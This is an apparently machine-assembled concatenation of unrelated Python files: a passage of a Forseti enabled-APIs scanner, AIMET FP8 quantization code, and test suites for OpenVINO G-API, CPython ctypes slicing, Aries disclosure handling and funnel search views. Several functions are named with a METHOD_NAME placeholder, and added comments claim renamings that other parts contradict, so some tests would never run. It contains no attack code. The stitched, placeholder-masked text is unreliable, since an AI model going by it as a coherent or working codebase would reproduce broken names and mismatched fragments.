    def __init__(self, global_configs, scanner_configs, service_config,
                 model_name, snapshot_timestamp, rules):
        """Initialization.

        Args:
            global_configs (dict): Global configurations.
            scanner_configs (dict): Scanner configurations.
            service_config (ServiceConfig): Forseti 2.0 service configs
            model_name (str): name of the data model
            snapshot_timestamp (str): Timestamp, formatted as YYYYMMDDTHHMMSSZ.
            rules (str): Fully-qualified path and filename of the rules file.
        """
        super(EnabledApisScanner, self).__init__(
            global_configs,
            scanner_configs,
            service_config,
            model_name,
            snapshot_timestamp,
            rules)
        # Build the rule book once up front so find_violations() can run
        # repeatedly without re-reading the rules file.
        self.rules_engine = enabled_apis_rules_engine.EnabledApisRulesEngine(
            rules_file_path=self.rules,
            snapshot_timestamp=self.snapshot_timestamp)
        self.rules_engine.build_rule_book(self.global_configs)

    @staticmethod
    def _flatten_violations(violations):
        """Flatten RuleViolations into a dict for each RuleViolation member.

        Args:
            violations (list): The RuleViolations to flatten.

        Yields:
            dict: Iterator of RuleViolations as a dict per member.
        """
        for violation in violations:
            # Emit one flat record per offending API so a violation covering
            # several APIs becomes several rows.
            for api in violation.apis:
                violation_data = {
                    'full_name': violation.full_name,
                    'api_name': api,
                }
                yield {
                    'resource_id': violation.resource_id,
                    'resource_type': violation.resource_type,
                    'resource_name': violation.resource_name,
                    'full_name': violation.full_name,
                    'rule_index': violation.rule_index,
                    'rule_name': violation.rule_name,
                    'violation_type': violation.violation_type,
                    'violation_data': violation_data,
                    'resource_data': violation.resource_data
                }

    def _output_results(self, all_violations):
        """Output results.

        Args:
            all_violations (list): A list of violations
        """
        all_violations = list(self._flatten_violations(all_violations))
        self._output_results_to_db(all_violations)

    def _find_violations(self, enabled_apis_data):
        """Find violations in the enabled APIs.

        Args:
            enabled_apis_data (list): enabled APIs data to find violations in,
                as (Project, [api_name, ...]) pairs.

        Returns:
            list: A list of all violations
        """
        all_violations = []
        LOGGER.info('Finding enabled API violations...')
        for project, enabled_apis in enabled_apis_data:
            violations = self.rules_engine.find_violations(
                project, enabled_apis)
            LOGGER.debug(violations)
            all_violations.extend(violations)
        return all_violations

    def METHOD_NAME(self):
        """Retrieves the data for scanner.

        Returns:
            list: (Project, [api_name, ...]) pairs, one per project that has
            at least one enabled API; an empty list (with a warning logged)
            when none are found.
        """
        model_manager = self.service_config.model_manager
        scoped_session, data_access = model_manager.get(self.model_name)
        with scoped_session as session:
            enabled_apis_data = []
            for apis in data_access.scanner_iter(session, 'enabled_apis'):
                enabled_apis = []
                # apis.data is a JSON list; keep only entries that actually
                # name a service in their config.
                for enabled_api in json.loads(apis.data):
                    if enabled_api.get('config', {}).get('name'):
                        enabled_apis.append(
                            enabled_api.get('config').get('name'))
                if enabled_apis:
                    enabled_apis_data.append(
                        (Project(apis.parent.name,
                                 apis.parent.full_name,
                                 apis.data),
                         enabled_apis))
            if not enabled_apis_data:
                LOGGER.warning('No Enabled APIs found.')
                return []
        return enabled_apis_data

    def run(self):
        """Runs the data collection."""
        enabled_apis_data = self.METHOD_NAME()
        all_violations = self._find_violations(enabled_apis_data)
        self._output_results(all_violations)
# /usr/bin/env python3.5
# -*- mode: python -*-
# =============================================================================
# @@-COPYRIGHT-START-@@
#
# Copyright (c) 2018-2022, Qualcomm Innovation Center, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# @@-COPYRIGHT-END-@@
# =============================================================================
""" FP8 quantization and supporting range setting functions """
import torch
from aimet_common.defs import QuantScheme
NUM_MANTISSA_BITS = 3
def METHOD_NAME(tensor, tensor_quantizer, per_channel):
    """Min-max range initialization.

    Returns the absolute max of *tensor*; with per_channel=True the reduction
    keeps the quantizer's channel axis, and the per-channel maxima are also
    stored on tensor_quantizer.fp8_maxval (the global path does not set it).
    """
    abs_tensor = torch.abs(tensor)
    if not per_channel:
        return max(torch.abs(abs_tensor.min()), abs_tensor.max()).to(abs_tensor.device)
    kept_axis = tensor_quantizer.channel_axis
    reduced = abs_tensor
    # Reduce every axis except the channel axis, highest axis first so the
    # remaining axis indices stay valid.
    for axis in reversed(range(reduced.dim())):
        if axis != kept_axis:
            reduced = reduced.max(axis)[0]
    tensor_quantizer.fp8_maxval = reduced.clone().to(reduced.device)
    return reduced
def mantissa_bits_to_device(tensor):
    """
    Ensure NUM_MANTISSA_BITS is copied to the same device as tensor (only once)
    """
    global NUM_MANTISSA_BITS  # pylint: disable=global-statement
    # Lazily replace the module-level int with a 1-element tensor on first use.
    # NOTE(review): subsequent calls never re-check the device — assumes all
    # tensors passed in live on a single device; confirm for multi-GPU use.
    if not isinstance(NUM_MANTISSA_BITS, torch.Tensor):
        NUM_MANTISSA_BITS = torch.Tensor([NUM_MANTISSA_BITS]).to(tensor.device)
def init_mse(tensor, tensor_quantizer, per_channel):
    """
    MSE initialization. Nearly equivalent to tf_enhanced.

    Sweeps 111 candidate maxvals per channel (0.1x to 1.2x the absolute max),
    quantizes the tensor with each, and returns the candidate(s) with the
    lowest mean squared error.
    """
    channel = tensor_quantizer.channel_axis
    if per_channel:
        # Per-channel absolute maxima, one candidate grid per channel.
        mxs = [torch.max(torch.abs(xc.min()), torch.abs(xc.max())) for xc in tensor.split(1, dim=channel)]
        lsp = [torch.linspace(0.1 * mx.item(), 1.2 * mx.item(), 111) for mx in mxs]
        # 111 x n_channels (or 1 in case not --per-channel)
        linspaces = torch.stack(lsp).to(tensor.device).transpose(0, 1)
    else:
        mx = torch.max(torch.abs(tensor.min()), torch.abs(tensor.max()))
        lsp = [torch.linspace(0.1 * mx.item(), 1.2 * mx.item(), 111)]
        # 111 x 1
        linspaces = torch.stack(lsp).to(tensor.device).transpose(0, 1)
    mses = torch.zeros_like(linspaces)
    # Average the squared error over every axis except the channel axis.
    meandims = list(torch.arange(len(tensor.shape)))
    if per_channel:
        meandims.remove(channel)
    mantissa_bits_to_device(tensor)
    for i, maxval in enumerate(linspaces):
        xfp = quantize_to_fp8(tensor, maxval, NUM_MANTISSA_BITS, channel)
        mse = ((tensor - xfp) ** 2).mean(dim=meandims)
        mses[i, :] = mse
    # Per channel, pick the candidate row with the smallest MSE.
    best_mse = mses.argmin(0)
    maxval = torch.tensor([linspaces[best_mse[i], i] for i in range(linspaces.shape[-1])]).to(tensor.device)
    return maxval
def init_percentile(*_):
    """Placeholder for percentile-based range initialization.

    The FP8 path does not implement the percentile quant scheme, so any call
    fails fast. All arguments are accepted and ignored.
    """
    message = "Percentile scheme is not supported for FP8"
    raise NotImplementedError(message)
# Maps each supported quant scheme to its range-initialization routine.
INIT_MAP = {
    QuantScheme.post_training_tf: METHOD_NAME,  # minmax
    QuantScheme.post_training_tf_enhanced: init_mse,  # MSE
    QuantScheme.post_training_percentile: init_percentile  # unsupported: raises
}
def fp8_quantizer(tensor, tensor_quantizer, _):
    """
    FP8 quantization entry function.

    Requires that one of the INIT_MAP routines has already populated
    tensor_quantizer.fp8_maxval; the third argument is accepted for
    signature compatibility and ignored.
    """
    mantissa_bits_to_device(tensor)
    if not hasattr(tensor_quantizer, 'fp8_maxval') or tensor_quantizer.fp8_maxval is None:
        raise ValueError('tensor_quantizer.fp8_maxval not present or not initialized!')
    return quantize_to_fp8(
        tensor, tensor_quantizer.fp8_maxval, NUM_MANTISSA_BITS, tensor_quantizer.channel_axis)
def quantize_to_fp8(x_float: torch.Tensor,
                    maxval: torch.Tensor,
                    mantissa_bits: torch.Tensor,
                    per_channel_axis: int = 0,
                    ) -> torch.Tensor:
    """
    FP8 quantizer that exploits the fact that FP quantization is just INT quantization with
    scales that depend on the input.

    :param x_float: tensor to quantize
    :param maxval: clipping threshold(s); scalar, 1-element, or per-channel
    :param mantissa_bits: number of mantissa bits M (exponent bits are 7 - M)
    :param per_channel_axis: channel axis used when maxval is per-channel
    :return: tensor of the same shape, rounded to the representable FP8 grid
    """
    # For learning: ensure that the number of mantissa bits is rounded and clamped to
    # allowed values. NB: torch.round should be replaced by ste_round_func (not included
    # here yet)
    # TODO for learning we need this as well:
    # mantissa_bits = torch.clamp(torch.round(mantissa_bits), 1, 7)
    # Compute exponent bits from the (learned) number of exponent bits. NB: assumes FP8
    exponent_bits = 7 - mantissa_bits
    # Tensorized per-channel quantization: ensure that maxval has the same number of
    # dimensions as x, where the channel that is individually quantized has size C,
    # and all other channels have size 1. E.g. for a conv tensor with C output channels,
    # maxval will have shape [C, 1, 1, 1]. This allows broadcasting maxval over the
    # input tensor in steps below.
    if maxval.shape and maxval.shape[0] != 1 and len(maxval.shape) != len(x_float.shape):
        new_shape = [1] * len(x_float.shape)
        new_shape[per_channel_axis] = -1
        maxval = maxval.view(new_shape)
    # Math explanation of what happens here:
    # Bias is computed from maxval: $B=2^E - \log_2(M) + \log_2(2 - 2^{-M}) - 1$
    # This follows from maxval $M=(2 - 2^{-M}) \cdot 2^{2^E-1-B}$.
    bias = 2 ** exponent_bits - torch.log2(maxval) + torch.log2(2 - 2 ** (-mantissa_bits)) - 1
    # Ensure no values are greater than the maximum value represented by an 8 bit float system
    # with M mantissa and E exponent bits. torch.min/torch.max are used to allow gradients to
    # flow to maxval
    x_clipped = torch.min(torch.max(x_float, -maxval), maxval)
    # FP quantization scale is determined per-element, and is computed as
    # \log_2 s = \left\lfloor \log_2 |x_c| + B \right\rfloor - M - B
    # the addition of bias inside the floor and subtraction outside ensures that a
    # tensor scaling $\alpha \neq 1$ is correctly incorporated
    log_scales = torch.floor(torch.log2(torch.abs(x_clipped)) + bias).detach()
    # This ensures scales are never smaller than the subnormal scale
    log_scales = torch.clamp(log_scales, 1.)
    # Second step of computing scale $s$
    scales = 2. ** (log_scales - mantissa_bits - bias)
    # Using the per-element scale we can quantize the clipped input tensor to the FP grid
    return torch.round(x_clipped / scales) * scales
"""
Copyright (c) 2018-2023 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pytest
pytest.importorskip('openvino.inference_engine')
pytest.importorskip('cv2.gapi.ie.params')
pytest.importorskip('openvino.tools.accuracy_checker.launcher.gapi_launcher')
import cv2
import numpy as np
from openvino.tools.accuracy_checker.launcher.launcher import create_launcher
from openvino.tools.accuracy_checker.config import ConfigError
def get_gapi_test_model(models_dir):
    """Create a G-API launcher configured for the SampLeNet test model
    (3x32x32 'data' input, classification head on 'fc3')."""
    config = {
        "framework": "g-api",
        #"weights": str(models_dir / "SampLeNet.bin"),
        "model": models_dir,
        "adapter": "classification",
        "device": "cpu",
        "inputs": [{"name": "data", "type": "INPUT", "shape": "(3, 32, 32)"}],
        'outputs': ['fc3']
    }
    return create_launcher(config)
class TestGAPILauncher:
    """Smoke tests for the G-API launcher against the SampLeNet test model."""

    def test_launcher_creates(self, models_dir):
        # The launcher should expose the model's NCHW input shape.
        assert get_gapi_test_model(models_dir).inputs['data'] == (1, 3, 32, 32)

    def METHOD_NAME(self, data_dir, models_dir):
        """End-to-end inference: class index 7 is expected for 1.jpg."""
        test_model = get_gapi_test_model(models_dir)
        _, _, h, w = test_model.inputs['data']
        img_raw = cv2.imread(str(data_dir / '1.jpg'))
        img_resized = cv2.resize(img_raw, (w, h))
        res = test_model.predict([{'data': img_resized}], [{}])
        assert np.argmax(res[0]['fc3']) == 7
@pytest.mark.usefixtures('mock_path_exists')
class TestOpenCVLauncherConfig:
    """Negative config tests: each case omits one required key (kept as a
    commented-out line for clarity) and expects launcher creation to fail."""

    def test_missed_framework_in_create_gapi_launcher_raises_config_error_exception(self):
        config = {
            # 'framework': 'g-api',
            'model': 'model.xml',
            'weights': 'weights.bin',
            'device': 'CPU',
            'adapter': 'classification',
            'inputs': [{'name': 'data', 'type': 'INPUT'}],
            'outputs': ['out']
        }
        # Without 'framework' the launcher registry lookup itself fails,
        # hence KeyError rather than ConfigError.
        with pytest.raises(KeyError):
            create_launcher(config)

    def test_missed_model_in_create_gapi_launcher_raises_config_error_exception(self):
        config = {
            'framework': 'g-api',
            # 'model': 'model.ocv',
            'weights': 'weights.bin',
            'device': 'CPU',
            'adapter': 'classification',
            'inputs': [{'name': 'data', 'type': 'INPUT'}],
            'outputs': ['out']
        }
        with pytest.raises(ConfigError):
            create_launcher(config, 'model')

    def test_missed_device_in_create_gapi_launcher_raises_config_error_exception(self):
        config = {
            'framework': 'g-api',
            'model': 'model.xml',
            'weights': 'weights.bin',
            # 'device': 'not_device',
            'adapter': 'classification',
            'inputs': [{'name': 'data', 'type': 'INPUT'}],
            'outputs': ['out']
        }
        with pytest.raises(ConfigError):
            create_launcher(config)

    def test_missed_inputs_in_create_gapi_launcher_raises_config_error_exception(self):
        config = {
            'framework': 'g-api',
            'model': 'model.xml',
            'weights': 'weights.bin',
            'device': 'CPU',
            'backend': 'not_backend',
            'adapter': 'classification',
            # 'inputs': [{'name': 'data', 'type': 'INPUT'}]
            'outputs': ['out']
        }
        with pytest.raises(ConfigError):
            create_launcher(config)

    def test_missed_outputs_in_create_gapi_launcher_raises_config_error_exception(self):
        config = {
            'framework': 'g-api',
            'model': 'model.xml',
            'weights': 'weights.bin',
            'device': 'CPU',
            'backend': 'not_backend',
            'adapter': 'classification',
            'inputs': [{'name': 'data', 'type': 'INPUT'}]
            # 'outputs': ['out']
        }
        with pytest.raises(ConfigError):
            create_launcher(config)
import unittest
from ctypes import *
from ctypes.test import need_symbol
import _ctypes_test
class SlicesTestCase(unittest.TestCase):
    """Slicing behaviour of ctypes arrays and C-returned pointers.

    Covers read/write slices on c_int arrays, slicing char/byte/wchar
    pointers returned from C (my_strdup/my_wcsdup in _ctypes_test), and
    slicing a c_char array.
    """

    def test_getslice_cint(self):
        # Reading slices from a c_int array must match list slicing,
        # including extended slices with negative steps.
        a = (c_int * 100)(*range(1100, 1200))
        b = list(range(1100, 1200))
        self.assertEqual(a[0:2], b[0:2])
        self.assertEqual(a[0:2:], b[0:2:])
        self.assertEqual(len(a), len(b))
        self.assertEqual(a[5:7], b[5:7])
        self.assertEqual(a[5:7:], b[5:7:])
        self.assertEqual(a[-1], b[-1])
        self.assertEqual(a[:], b[:])
        self.assertEqual(a[::], b[::])
        self.assertEqual(a[10::-1], b[10::-1])
        self.assertEqual(a[30:20:-1], b[30:20:-1])
        self.assertEqual(a[:12:6], b[:12:6])
        self.assertEqual(a[2:6:4], b[2:6:4])
        # Slice assignment from an arbitrary iterable.
        a[0:5] = range(5, 10)
        self.assertEqual(a[0:5], list(range(5, 10)))
        self.assertEqual(a[0:5:], list(range(5, 10)))
        self.assertEqual(a[4::-1], list(range(9, 4, -1)))

    def test_setslice_cint(self):
        # Writing simple and extended slices into a c_int array.
        a = (c_int * 100)(*range(1100, 1200))
        b = list(range(1100, 1200))
        a[32:47] = list(range(32, 47))
        self.assertEqual(a[32:47], list(range(32, 47)))
        a[32:47] = range(132, 147)
        self.assertEqual(a[32:47:], list(range(132, 147)))
        a[46:31:-1] = range(232, 247)
        self.assertEqual(a[32:47:1], list(range(246, 231, -1)))
        # Restore the original values so a[:] == b again.
        a[32:47] = range(1132, 1147)
        self.assertEqual(a[:], b)
        a[32:47:7] = range(3)
        b[32:47:7] = range(3)
        self.assertEqual(a[:], b)
        a[33::-3] = range(12)
        b[33::-3] = range(12)
        self.assertEqual(a[:], b)
        from operator import setitem
        # TypeError: int expected instead of str instance
        self.assertRaises(TypeError, setitem, a, slice(0, 5), "abcde")
        # TypeError: int expected instead of str instance
        self.assertRaises(TypeError, setitem, a, slice(0, 5),
                          ["a", "b", "c", "d", "e"])
        # TypeError: int expected instead of float instance
        self.assertRaises(TypeError, setitem, a, slice(0, 5),
                          [1, 2, 3, 4, 3.14])
        # ValueError: Can only assign sequence of same size
        self.assertRaises(ValueError, setitem, a, slice(0, 5), range(32))

    def test_char_ptr(self):
        s = b"abcdefghijklmnopqrstuvwxyz"
        dll = CDLL(_ctypes_test.__file__)
        dll.my_strdup.restype = POINTER(c_char)
        dll.my_free.restype = None
        res = dll.my_strdup(s)
        self.assertEqual(res[:len(s)], s)
        self.assertEqual(res[:3], s[:3])
        self.assertEqual(res[:len(s):], s)
        self.assertEqual(res[len(s)-1:-1:-1], s[::-1])
        self.assertEqual(res[len(s)-1:5:-7], s[:5:-7])
        self.assertEqual(res[0:-1:-1], s[0::-1])
        import operator
        # A bare pointer has no length, so open-ended / negative-start
        # slices cannot be resolved and must raise ValueError.
        self.assertRaises(ValueError, operator.getitem,
                          res, slice(None, None, None))
        self.assertRaises(ValueError, operator.getitem,
                          res, slice(0, None, None))
        self.assertRaises(ValueError, operator.getitem,
                          res, slice(None, 5, -1))
        self.assertRaises(ValueError, operator.getitem,
                          res, slice(-5, None, None))
        self.assertRaises(TypeError, operator.setitem,
                          res, slice(0, 5), "abcde")
        dll.my_free(res)
        # Re-read the same C string through a byte pointer: slices now
        # come back as lists of ints.
        dll.my_strdup.restype = POINTER(c_byte)
        res = dll.my_strdup(s)
        self.assertEqual(res[:len(s)], list(range(ord("a"), ord("z")+1)))
        self.assertEqual(res[:len(s):], list(range(ord("a"), ord("z")+1)))
        dll.my_free(res)

    def test_char_ptr_with_free(self):
        dll = CDLL(_ctypes_test.__file__)
        s = b"abcdefghijklmnopqrstuvwxyz"

        class allocated_c_char_p(c_char_p):
            pass

        dll.my_free.restype = None

        def errcheck(result, func, args):
            # Copy the value out, then free the C allocation immediately.
            retval = result.value
            dll.my_free(result)
            return retval

        dll.my_strdup.restype = allocated_c_char_p
        dll.my_strdup.errcheck = errcheck
        try:
            res = dll.my_strdup(s)
            self.assertEqual(res, s)
        finally:
            del dll.my_strdup.errcheck

    def test_char_array(self):
        # Renamed from the placeholder METHOD_NAME: the name must start
        # with "test" or unittest never collects/runs this case.
        s = b"abcdefghijklmnopqrstuvwxyz\0"
        p = (c_char * 27)(*s)
        self.assertEqual(p[:], s)
        self.assertEqual(p[::], s)
        self.assertEqual(p[::-1], s[::-1])
        self.assertEqual(p[5::-2], s[5::-2])
        self.assertEqual(p[2:5:-3], s[2:5:-3])

    @need_symbol('c_wchar')
    def test_wchar_ptr(self):
        s = "abcdefghijklmnopqrstuvwxyz\0"
        dll = CDLL(_ctypes_test.__file__)
        dll.my_wcsdup.restype = POINTER(c_wchar)
        dll.my_wcsdup.argtypes = POINTER(c_wchar),
        dll.my_free.restype = None
        res = dll.my_wcsdup(s)
        self.assertEqual(res[:len(s)], s)
        self.assertEqual(res[:len(s):], s)
        self.assertEqual(res[len(s)-1:-1:-1], s[::-1])
        self.assertEqual(res[len(s)-1:5:-7], s[:5:-7])
        import operator
        self.assertRaises(TypeError, operator.setitem,
                          res, slice(0, 5), "abcde")
        dll.my_free(res)
        # Re-read the wide string through an integer pointer of matching
        # width to check the raw code points.
        if sizeof(c_wchar) == sizeof(c_short):
            dll.my_wcsdup.restype = POINTER(c_short)
        elif sizeof(c_wchar) == sizeof(c_int):
            dll.my_wcsdup.restype = POINTER(c_int)
        elif sizeof(c_wchar) == sizeof(c_long):
            dll.my_wcsdup.restype = POINTER(c_long)
        else:
            self.skipTest('Pointers to c_wchar are not supported')
        res = dll.my_wcsdup(s)
        tmpl = list(range(ord("a"), ord("z")+1))
        self.assertEqual(res[:len(s)-1], tmpl)
        self.assertEqual(res[:len(s)-1:], tmpl)
        self.assertEqual(res[len(s)-2:-1:-1], tmpl[::-1])
        self.assertEqual(res[len(s)-2:5:-7], tmpl[:5:-7])
        dll.my_free(res)
################################################################
if __name__ == "__main__":
    # Allow running this test module directly, outside the test runner.
    unittest.main()
import pytest
from asynctest import mock as async_mock
from aries_cloudagent.storage.error import StorageNotFoundError
from ......core.protocol_registry import ProtocolRegistry
from ......messaging.base_handler import HandlerException
from ......messaging.request_context import RequestContext
from ......messaging.responder import MockResponder
from .....didcomm_prefix import DIDCommPrefix
from ...handlers.disclosures_handler import DisclosuresHandler
from ...messages.disclosures import Disclosures
from ...messages.queries import Queries, QueryItem
from ...models.discovery_record import V20DiscoveryExchangeRecord
# Fake message family/type registered with the ProtocolRegistry so the
# discover-features queries in these tests have something to match.
TEST_MESSAGE_FAMILY = "TEST_FAMILY"
TEST_MESSAGE_TYPE = TEST_MESSAGE_FAMILY + "/MESSAGE"
@pytest.fixture()
def request_context() -> RequestContext:
    """Yield a test RequestContext wired to a ready mock connection."""
    context = RequestContext.test_context()
    context.connection_record = async_mock.MagicMock(connection_id="test123")
    context.connection_ready = True
    yield context
class TestDisclosuresHandler:
    """Tests for DisclosuresHandler (discover-features v2.0).

    Each case feeds a Disclosures message through the handler and checks
    that no further messages are produced: a disclosure terminates the
    exchange, regardless of how (or whether) the exchange record is found.
    """

    @pytest.mark.asyncio
    async def test_disclosures(self, request_context):
        # Renamed from the placeholder METHOD_NAME so pytest collects it.
        # Happy path: the exchange record is found by thread id.
        registry = ProtocolRegistry()
        registry.register_message_types({TEST_MESSAGE_TYPE: object()})
        request_context.injector.bind_instance(ProtocolRegistry, registry)
        disclosures = Disclosures(
            disclosures=[
                {
                    "id": DIDCommPrefix.qualify_current("basicmessage/1.0/message"),
                    "feature-type": "protocol",
                    "roles": [],
                },
                {"feature-type": "goal-code", "id": "aries.sell.goods.consumer"},
            ]
        )
        test_queries = [
            QueryItem(
                feature_type="protocol", match="https://didcomm.org/tictactoe/1.*"
            ),
            QueryItem(feature_type="goal-code", match="aries.*"),
        ]
        queries = Queries(queries=test_queries)
        discovery_record = V20DiscoveryExchangeRecord(
            connection_id="test123",
            thread_id="test123",
            queries_msg=queries,
        )
        disclosures.assign_thread_id("test123")
        request_context.message = disclosures
        handler = DisclosuresHandler()
        mock_responder = MockResponder()
        with async_mock.patch.object(
            V20DiscoveryExchangeRecord,
            "retrieve_by_id",
            async_mock.CoroutineMock(return_value=discovery_record),
        ) as mock_get_rec_thread_id:
            await handler.handle(request_context, mock_responder)
            # A disclosure is terminal: the handler must not respond.
            assert not mock_responder.messages

    @pytest.mark.asyncio
    async def test_disclosures_connection_id_no_thid(self, request_context):
        # Lookup by thread id fails; handler falls back to connection id.
        registry = ProtocolRegistry()
        registry.register_message_types({TEST_MESSAGE_TYPE: object()})
        request_context.injector.bind_instance(ProtocolRegistry, registry)
        disclosures = Disclosures(
            disclosures=[
                {
                    "id": DIDCommPrefix.qualify_current("basicmessage/1.0/message"),
                    "feature-type": "protocol",
                    "roles": [],
                },
                {"feature-type": "goal-code", "id": "aries.sell.goods.consumer"},
            ]
        )
        test_queries = [
            QueryItem(
                feature_type="protocol", match="https://didcomm.org/tictactoe/1.*"
            ),
            QueryItem(feature_type="goal-code", match="aries.*"),
        ]
        queries = Queries(queries=test_queries)
        discovery_record = V20DiscoveryExchangeRecord(
            connection_id="test123",
            thread_id="test123",
            queries_msg=queries,
        )
        disclosures.assign_thread_id("test123")
        request_context.message = disclosures
        handler = DisclosuresHandler()
        mock_responder = MockResponder()
        with async_mock.patch.object(
            V20DiscoveryExchangeRecord,
            "retrieve_by_id",
            async_mock.CoroutineMock(side_effect=StorageNotFoundError),
        ) as mock_get_rec_thread_id, async_mock.patch.object(
            V20DiscoveryExchangeRecord,
            "retrieve_by_connection_id",
            async_mock.CoroutineMock(return_value=discovery_record),
        ) as mock_get_rec_conn_id:
            await handler.handle(request_context, mock_responder)
            assert not mock_responder.messages

    @pytest.mark.asyncio
    async def test_disclosures_no_conn_id_no_thid(self, request_context):
        # Neither lookup succeeds; the handler still completes silently.
        registry = ProtocolRegistry()
        registry.register_message_types({TEST_MESSAGE_TYPE: object()})
        request_context.injector.bind_instance(ProtocolRegistry, registry)
        disclosures = Disclosures(
            disclosures=[
                {
                    "id": DIDCommPrefix.qualify_current("basicmessage/1.0/message"),
                    "feature-type": "protocol",
                    "roles": [],
                },
                {"feature-type": "goal-code", "id": "aries.sell.goods.consumer"},
            ]
        )
        test_queries = [
            QueryItem(
                feature_type="protocol", match="https://didcomm.org/tictactoe/1.*"
            ),
            QueryItem(feature_type="goal-code", match="aries.*"),
        ]
        disclosures.assign_thread_id("test123")
        request_context.message = disclosures
        handler = DisclosuresHandler()
        mock_responder = MockResponder()
        with async_mock.patch.object(
            V20DiscoveryExchangeRecord,
            "retrieve_by_id",
            async_mock.CoroutineMock(side_effect=StorageNotFoundError),
        ) as mock_get_rec_thread_id, async_mock.patch.object(
            V20DiscoveryExchangeRecord,
            "retrieve_by_connection_id",
            async_mock.CoroutineMock(side_effect=StorageNotFoundError),
        ) as mock_get_rec_conn_id:
            await handler.handle(request_context, mock_responder)
            assert not mock_responder.messages

    @pytest.mark.asyncio
    async def test_disclose_connection_not_ready(self, request_context):
        # A disclosure over a not-ready connection must raise.
        request_context.connection_ready = False
        disclosures = Disclosures(
            disclosures=[
                {
                    "id": DIDCommPrefix.qualify_current("basicmessage/1.0/message"),
                    "feature-type": "protocol",
                    "roles": [],
                },
                {"feature-type": "goal-code", "id": "aries.sell.goods.consumer"},
            ]
        )
        disclosures.assign_thread_id("test123")
        request_context.message = disclosures
        handler = DisclosuresHandler()
        mock_responder = MockResponder()
        with pytest.raises(HandlerException):
            await handler.handle(request_context, mock_responder)
"""
Tests for search views.
These tests verify the structure of the views, but don't actually test for whether the
views are returning expected results (at this time). Proper search testing requires a
corpus of searchable data in fixtures.
"""
# pylint: disable=redefined-outer-name
from typing import cast
import pytest
from flask import url_for
from funnel.models import Query
from funnel.views.search import (
SearchInAccountProvider,
SearchInProjectProvider,
get_tsquery,
search_counts,
search_providers,
)
# Provider keys, grouped by the narrowest scope each provider supports;
# used below to parametrize the scope-specific tests.
search_all_types = list(search_providers.keys())
search_profile_types = [
    k for k, v in search_providers.items() if isinstance(v, SearchInAccountProvider)
]
search_project_types = [
    k for k, v in search_providers.items() if isinstance(v, SearchInProjectProvider)
]
@pytest.fixture()
def db_session(db_session_truncate):
    """Use the truncate-based database session fixture.

    The default rollback fixture is not compatible with Flask-Executor, which
    is used in the search methods to parallelize tasks.
    """
    # Renamed from the placeholder METHOD_NAME: pytest fixtures are
    # requested by name, so this must be `db_session` to override the
    # default session fixture.
    return db_session_truncate
# --- Tests for datatypes returned by search providers ---------------------------------
@pytest.mark.parametrize('stype', search_all_types)
def test_search_all_count_returns_int(stype, all_fixtures) -> None:
    """Every provider's all_count() must return an int."""
    count = search_providers[stype].all_count(get_tsquery("test"))
    assert isinstance(count, int)
@pytest.mark.parametrize('stype', search_profile_types)
def test_search_profile_count_returns_int(stype, org_ankhmorpork, all_fixtures) -> None:
    """Every account-scoped provider's account_count() must return an int."""
    provider = cast(SearchInAccountProvider, search_providers[stype])
    count = provider.account_count(get_tsquery("test"), org_ankhmorpork)
    assert isinstance(count, int)
@pytest.mark.parametrize('stype', search_project_types)
def test_search_project_count_returns_int(stype, project_expo2010, all_fixtures) -> None:
    """Every project-scoped provider's project_count() must return an int."""
    provider = cast(SearchInProjectProvider, search_providers[stype])
    count = provider.project_count(get_tsquery("test"), project_expo2010)
    assert isinstance(count, int)
@pytest.mark.parametrize('stype', search_all_types)
def test_search_all_returns_query(stype, all_fixtures) -> None:
    """Every provider's all_query() must return a query."""
    query = search_providers[stype].all_query(get_tsquery("test"))
    assert isinstance(query, Query)
@pytest.mark.parametrize('stype', search_profile_types)
def test_search_profile_returns_query(stype, org_ankhmorpork, all_fixtures) -> None:
    """Every account-scoped provider's account_query() must return a query."""
    provider = cast(SearchInAccountProvider, search_providers[stype])
    query = provider.account_query(get_tsquery("test"), org_ankhmorpork)
    assert isinstance(query, Query)
@pytest.mark.parametrize('stype', search_project_types)
def test_search_project_returns_query(stype, project_expo2010, all_fixtures) -> None:
    """Every project-scoped provider's project_query() must return a query."""
    provider = cast(SearchInProjectProvider, search_providers[stype])
    query = provider.project_query(get_tsquery("test"), project_expo2010)
    assert isinstance(query, Query)
# --- Test search functions ------------------------------------------------------------
@pytest.mark.usefixtures('request_context', 'all_fixtures')
def test_search_counts(org_ankhmorpork, project_expo2010) -> None:
    """search_counts returns a list of type/label/count dicts per scope."""
    all_scopes = (
        search_counts(get_tsquery("test")),
        search_counts(get_tsquery("test"), account=org_ankhmorpork),
        search_counts(get_tsquery("test"), project=project_expo2010),
    )
    for resultset in all_scopes:
        assert isinstance(resultset, list)
